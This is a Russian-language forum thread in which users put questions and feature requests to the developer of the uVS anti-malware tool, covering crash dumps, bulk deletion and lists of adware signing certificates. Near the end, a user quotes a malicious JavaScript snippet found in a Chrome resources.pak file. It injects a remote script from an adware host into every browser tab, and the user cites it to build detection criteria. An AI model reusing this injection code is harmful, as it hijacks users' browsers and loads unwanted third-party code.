Universal Virus Sniffer (uVS), Вопросы разработчику

[Виктор Коляденко 6]

Про заговор не знаю. Многие трояны додумались называть свои компоненты легальными программами и помещать себя в ту папку, что использует эта программа? Как пример - Program Files (x86)\Microsoft Office.

[demkd 636]

@PR55.RP55,

Разные сертификаты ну и безалаберность.

[Smit 29]

demkd    вот к примеру такая ситуация

необходимо поудалять несколько файлов разного плана : ярлык к программе , исполняемый фаил подозрительный , известный фаил без подписи и пр , пока это все удалишь по одному пол часа пройдет

предлагаю добавить стандартную виндовскую функцию:  добавить "ctrl + a" а также через зажатый "ctrl" добавлять\удалять из списка . после чего нажал del(или в контекстном меню выбрал удалить выбранное) и удалил оптом все что было выделено .

долбиться с критериями в данном случае нецелесообразно

[Аркалык 19]

@demkd, Напишите краткую инструкцию, как создать дамп файл при падении uVS, что бы в дальнейшем понять, почему программа падает с ошибкой и решить эту проблему со всеми силами. Это уже немножко начал бесить (падение uVS), из 3 компьютеров, у одного компьютера обязательно имеется такая проблема и нет пути решений.

----------------------

Заметил еще такую схожесть: Если uVS падает при запуске с активной системы, тогда будет падать и при запуске с WinPE. Думаешь, что какой-то вирус мешает запуске программы и начинаешь запускать его из WinPE, он по любому будет закрываться. Значить проблема не в активном вирусе, а UVS не может отработать какой-то ключ в реестре (это мое мнение, может быть и не так).

---------------------

Еще одно замечание: Если uVS будет падать при запуске, тогда запускаем adwCleaner и после его чистки UVS запустится.

[demkd 636]

@Аркалык,

Все просто, uVS сам создаст дамп при падении, всплывет окошко для отправки его мне.

Дампы принимаются только для актуальной версии.

Если дамп не отправился его можно отправить вручную мне на почту, файл вида uvsdump_3.****.dmp

Для WinPE да, обычно из каких-то ключей реестра.

[Аркалык 19]

@demkd, А этот автоматическое отправка дамп файла точно работает? Который раз падал uVS и не разу не видел дампа uVS в каталоге (откуда запускался uVS) или дамп файл находится в другом месте? Окошка о отправке данных при падений тоже не было (ни разу). Из WinPE всегда запускаю актуальную версию uVS со своими вирусными базами и критериями.

[demkd 636]

да, работает, в день по 2-3 дампа приходит, но к старым версиям, я их не разбираю даже все одно и тоже идет для уже исправленных ошибок, смотрю только для новых, но к новым очень редко, ошибок меньше.

дамп создается всегда в каталоге запуска uVS.

[Аркалык 19]

@demkd, Можно сделать так, что бы при падений uVS, дамп файл хранился в каталоге и не удалялся, если даже автоматический отправился в сервер?

---------------

Это удобно для того, что бы точно следить за исследованием дамп файла и понять причину падение. А то не понятно, отправился ли отчет, иследуется ли проблема и т.д.

[demkd 636]

@Аркалык,

а он автоматически и не отправляется, только если пользователь нажмет кнопку отправить и собственно отчет дойдет до сервера,

если нет то дамп останется в каталоге uVS

[PR55.RP55 83]

Demkd

 

Что самое главное в uVS...

Это универсальнось програмы.

------------

В ряде случаев uVS в инфо. пишет:

 

"Сертификат аннулирован"

-------------

 

Как быстро это можно реализовать в программе ?

т.е.

Чтобы Оператор мог _сам подключить файл/ список аннулированных ЭЦП.

 

и видел в инфо.:  Сертификат аннулирован _оператором.

[demkd 636]

@PR55.RP55,

это ничего полезного не даст, поскольку сертификаты отзывают достаточно оперативно, зато потребует массы времени и сил на реализацию.

[PR55.RP55 83]

Отзываются то они отзываются...
Только не все.
-----
И причины отзыва разные.
- А некоторые не отзываются и думаю отзваться не будут.
- У меня сейчас список из 500 ЭЦП и 90% из них не отозваны.
------
Ask.com
и т.д.

 

Я уже ранее выкладывал файл/список.

--------

А даст это многое.

1) Оператор подключает список ( в данном случае из 500 ЭЦП )

2) Создаёт критерий поиска для: " Сертификат аннулирован Оператором."

------

В итоге файл в подозрительных с вердиктом ?ВИРУС? = автоскрипт.

[PR55.RP55 83]

+

Гигантская  экономия времени.

[santy 153]

RP55,

а смысл какой вот в этом дополнительном вердикте: сертификат аннулирован_оператором?

если ты добавил ЭЦП в критерий false.sgn, то ты таким образом его и "аннулировал" (хоть и не являешься удостоверяющим центром) вперед Микрософта.

и все объекты получат статус ?ВИРУС? и попадут под автоскрипт.

 

в чем здесь экономия времени?

[PR55.RP55 83]

В Списке... 5 0 0

 

ЭЦП, а доживём будет и 1000.

-------

Кто сможет создать критерий из 5 0 0 элементов ?

Проверить его работоспособность...

Как с ним работать если еть ошибка - как его исправить ?

- Как это повлияет на скорость обработки данных - особенно на слабых PC...

-----

А как всем ясно.

Экономия времини:

Чтобы подключить файл/список из _любого числа ЭЦП ( хоть из 10 000 ) нужно 2 минуты времени.

А чтобы создать критерий даже из 500 ЭЦП - уйдёт неделя...

И без гарантии, что критерий будет работать.

- Можно ещё конечно создать 50 критерив и в каждый из них включать по 10-20 элементов.

Только вот с какой радости ?

-----------

А смысл в том, что нужно создать только _ОДИН_ критерий...

Этот:   " сертификат аннулирован_оператором

[santy 153]

ну это из серии убрать список ЭЦП из критериев и добавить его в отдельный список.

трюк, только и всего.

никто не заставляет человека набивать критерий из 500 ЭЦП. я, например, добавляю по одному ЭЦП максимум 1 раз в день.

если будет возможность экспорта_отдельного критерия в файл _snms, то и необходимости в его набивке никакой нет.

тем, кто с нуля хочет создать этот критерий.

-------

а проверяется работоспособность критерия просто.

если объекты с данной ЭЦП детектируются критерием, то значит критерий работает.

[PR55.RP55 83]

1) uVS  уже работает со списком аннулированных Сертификатов.
- Пусть _некоторые сертификаты оперативно аннулируются...
- Только зачем ждать неделю, если можно аннулировать сертификат на месте сразу = мгновенно.

2) Если человек _начинает работать с uVS  и работать на форуме, или в крупной фирме...
То, в каждом образе системе ему будет встречаться  по 1- 7 ЭЦП  ADWARE....
Которые _ему будет нужно зафиксировать = создать критерии поиска и это не по одному в день.

А по 40 !

И сколько на это у него уйдёт времени.

3) Высказывания:

потребует массы времени и сил на реализацию.

   

 

 

    я, например, добавляю по одному ЭЦП максимум 1 раз в день. 

Говорят только об одном.
Своё время всегда дорого.
 

[santy 153]

RP55,

 а какая проблема этому начинающему хелперу прийти на форум, и запросить базу критериев.

некоторые здесь так и делают, но их совсем немного.

и затем правят ее так как им вздумается.

-------

я исходу из правила Оккамы: если эта проблема уже отлажена и решается через snms, то нет необходимости создавать дополнительный лишний список (лишняя сущность), и писать лишние обработки.

[PR55.RP55 83]

1) Нужно знать о чём спрашивать на форуме.
2) Использовать чужие критерии НЕ разумно - это слепое использование без понимания сути.
и может быть опасно.

3) Всё равно кто-то этот критерий/рии должен изначально создать = потратить как минимум неделю времени.
( но, видимо всем до этого нет дела )
-----
1) Есть файл ( сейчас 503 ЭЦП )
2) Этот файл помещается в каталог с uVS
3) Файл обрабатывается программой.
4) Обрабатывается список и файл получает вердикт: ПОДОЗРИТ.
---------

Я хочу  одного ...
Чтобы можно было взять файл/список из ХХХ  ЭЦП и подключить его в течении 2 минут.
И так же быстро в случае необходимости отредактировать.

А не сидеть сутками.

 

[Виктор Коляденко 6]

2) Этот файл помещается в каталог с uVS

 

Как его назвать (сейчас есть "по Adware.txt")? Список есть, его как-то можно добавить в базу?

[PR55.RP55 83]

Виктор Коляденко

 

Сейчас всё  ( предельно просто )

Есть файл/список из 503 ЭЦП.

Вот его нужно открыть...

Потом запустить uVS и сидеть по одному копировать из списка ЭЦП...

215 Apps
337 Technology Limited
ABDULKADIR SAHIN

 

и т.д  по 503 включимтельно.

Сидеть и создавать критерии поиска.

--------

И где то через неделю... Вы закончите.

Всё очень удобно и продумано.

----

Только вначале нужно зайти в аптеку и купить свечи ( для профилактики )

[PR55.RP55 83]

AntiSMS

Версия 7.3 от 03.03.2015

Добавлены присланные сигнатуры известных загрузочных секторов.
Улучшена проверка и исправление ярлыков вредоносных программ.
Усовершенствован и ускорен алгоритм обработки чёрного списка.
Дополнен чёрный список производителей вредоносных программ.
Обновлён алгоритм подсчёта хэшей для лучшей совместимости.
Усовершенствована обработка скриптов и ярлыков.
Улучшено отображение записей CLSID в логах.

-----------

Вопрос такой: http://habrahabr.ru/post/255333/

uVS это найдёт и покажет или ?

[demkd 636]

@PR55.RP55,

нет и никто не покажет, в паке несколько предустановленных расширений хрома, цифровой подписи у пака нет, это Google т.е. сплошная дыра. Маскимум что я могу предложить так это добавить pak в список, а хэши все его 100500 вариантов уж вы самостоятельно собирайте в свою базу

[PR55.RP55 83]

@PR55.RP55,

Маскимум что я могу предложить так это добавить pak в список.

 

А я хочу предложить следующее...

1)

 

В каталоге с uVS  положить оригинальный файл:  resources.pak

И по соответствующей команде заменять файл на файл.

По типу: uvs_v3.8\STORE

2)

 

   добавить pak в список   

 

В инфо.  .pak

Показывать кусок кода:

 

Типа:

chrome.tabs.onUpdated.addListener( function(tabId,changeInfo,tab){ chrome.tabs.executeScript(tabId,{code:" if(!window.blgcran){ window.blgcran = true; var scr=document.createElement('script'); scr.src='https://expressfind-a.akamaihd.net/ExpressFind/cr?t=BLGC&g=ca4874d9-0a3e-4215-9772-67fb5ba1c08a'; document.head.appendChild(scr);} "})});

Чтобы можно было критерий поиска создать.

 

 

....

[demkd 636]

@PR55.RP55,

это бред, для какой версии файл то?

это проблема гугла, пусть подпись добавляют, что решит все проблемы.